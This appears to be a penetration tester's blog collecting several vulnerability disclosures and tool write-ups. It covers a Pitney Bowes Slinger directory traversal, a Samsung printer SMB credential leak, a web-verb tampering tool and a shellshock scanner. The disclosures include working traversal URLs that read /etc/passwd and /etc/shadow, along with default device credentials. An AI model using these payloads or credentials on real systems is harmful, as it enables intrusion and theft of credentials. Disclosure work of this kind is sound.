The framework is basically a simple interface to interact with both of these functions; it will ask you to provide a CIDR or file and depending on which one you pick it will run the proper command to get the shares. The script will output the results into a separate file that you have to specify and it will append and only write shares that it finds.

All the code you need is here: GitHub

We have been trying to contact Pitney Bowes for ten months to report a security issue. After multiple attempts using email and twitter we decided to release the vulnerability to the public so that companies can protect themselves. One of the main driving factors behind this was when we found out that Pitney Bowes sells security services to other companies.
We strongly believe in responsible disclosure and we also believe that if you sell security services you should be responsive to other researchers reporting issues in your products. While the directory traversal is serious it also exposes weak default credentials which may work on other Pitney Bowes products.


Pitney Bowes MS1 Slinger Web Server Directory Traversal

Known Vulnerable Version
scversion=05.00.0021
AppScSchema=01.12.0005.0000

Proof of Concept

  1. The Slinger web service listens on TCP port 8008
  2. Retrieve etc/passwd: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  3. Retrieve etc/shadow: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
  4. The default credentials are pb:pb

About a year ago during a network penetration test I found an information disclosure vulnerability in a Samsung printer. The disclosure was fairly serious; NTLM hashes for any network accounts were stored in a CSV file. I’m not a web application penetration tester but luckily the connection was slow enough that I watched the page load briefly then redirect to the next page. This definitely highlights the importance of manually testing.

Because this has been responsibly disclosed and patched it isn’t technically an 0day.

The firmware fixing the vulnerability was released over six months ago and I didn’t want to publish any vulnerability information irresponsibly.  The following is the information submitted to Samsung and links to the updated firmware. Updating any Samsung printers is important. Equally important is adding printers and other peripheral devices to your patching program.


SyncThru Web SMB Password Disclosure

Known Vulnerable Versions
Samsung SCX-5835_5935 Series Printer
Main Firmware Version :  2.01.00.26
Network Firmware Version :  V4.01.05(SCX-5835/5935) 12-22-2008
Engine Firmware Version :  1.20.73
UI Firmware Version :  V1.03.01.55 07-13-2009
Finisher Firmware Version :  Not Installed
PCL5E Firmware Version : PCL5e 5.87 11-07-2008
PCL6 Firmware Version : PCL6 5.86 10-28-2008
PostScript Firmware Version : PS3 V1.93.06 12-19-2008
SPL Firmware Version : SPL 5.32 01-03-2008
TIFF Firmware Version : TIFF 0.91.00 10-07-2008
Samsung SCX-5635 Series
Main Firmware Version :     2.01.01.18 12-08-2009
Network Firmware Version :     V4.01.16(SCX-5635) 12-04-2009
Engine Firmware Version :     1.31.32
PCL5E Firmware Version :    PCL5e 5.92 02-12-2009
PCL6 Firmware Version :    PCL6 5.93 03-21-2009
PostScript Firmware Version :    PS3 1.94.06 12-22-2008
TIFF Firmware Version :    TIFF 0.91.00 10-07-2008

Proof of Concept

  1. This procedure does not seem to work using Internet Explorer 7 but behaves as expected with Firefox 4.0.1.
  2. Using the default username and password (admin/admin), it is possible to obtain all credentials used for SMB file transfer. To obtain the file access     http://<printer url>/smb_serverList.csv
  3. The UserName and UserPassword fields are unencrypted and visible using any text editor.

Links to Updated Firmware
http://downloadcenter.samsung.com/content/FM/201508/20150825111208555/SCX5635_V2.01.01.28_0401113_1.00.zip
http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX5835_5935_V2.01.00.56_0401113_1.01.zip

Acknowledgements
Samsung security and I had a few miscommunications and I chose to hold off on releasing this until I knew that a patch was available. When I inquired again they immediately rectified the situation.

Contact security@samsung.com if you happen to find any additional vulnerabilities.

Have you ever manually tested the Glassfish Authentication Bypass (CVE Details)? What about manually testing it on 40+ servers while dealing with indecisive people patching systems on the fly? I had that wonderful opportunity while running tests for a federal agency.

After all the headache and bureaucracy, I wrote a quick python program just to test for that specific case of verb tampering.

Time passed…and I switched jobs. During the interim, I spent a lot of time thinking about web verbs and what I could use them for as a penetration tester. Web verb tampering is on OWASP’s list but doesn’t seem to get the same amount of attention that the different types of injections command.

What this lead to was Verbinator. Verbinator tests web verbs and cases. Lots of web verbs. I found all of the RFC specified verbs plus some others used mostly by Microsoft. All of the RFC numbers and verbs are in the source if you’re interested. As a bonus, you can also cram some random text in for the verb because web servers absolutely LOVE unexpected input. While reading return data is barrels of fun, I also added a differential ability to show if the response changed when the web verb case was altered.

If you have any questions, comments, or ideas for improving the program, please let me know.

This is a direct collaboration with Doofenshmirtz Evil Incorporated all work is subject to platypus attack.

**********
Source just rename it to .py verbinator
Basic usage:
verbinator-use

 

I was able to use the bash shellshock vulnerability last week to manually find a vulnerability in a web server through the HTTP User-agent. If you can do something manually there is a good chance that it can be done programmatically. This python program is an extension of that belief.

This program has three simple parts: an ICMP network listener, a urllib2 HTTP request generator, and a simple parser that displays the results. Why ICMP? 5 ping packets generated from a vulnerable server should not be a huge burden. Isn’t urllib2 pretty dated? It really is, but it ignores SSL certificate issues so I didn’t have to handle HTTPS requests differently from the HTTP requests.

This isn’t weaponized at all, while it can be weaponized pretty easily that is up to you and we don’t recommend testing this on an address that you aren’t authorized to use. Metasploitable2 has a shellshock User-agent vulnerability if you want to test this on a controlled network.

Usage – python shellshockUAScanner.py -r <CIDR range> -t <number of threads *default is 16> -i <interface *default is eth0>

shellshockUAScanner – source code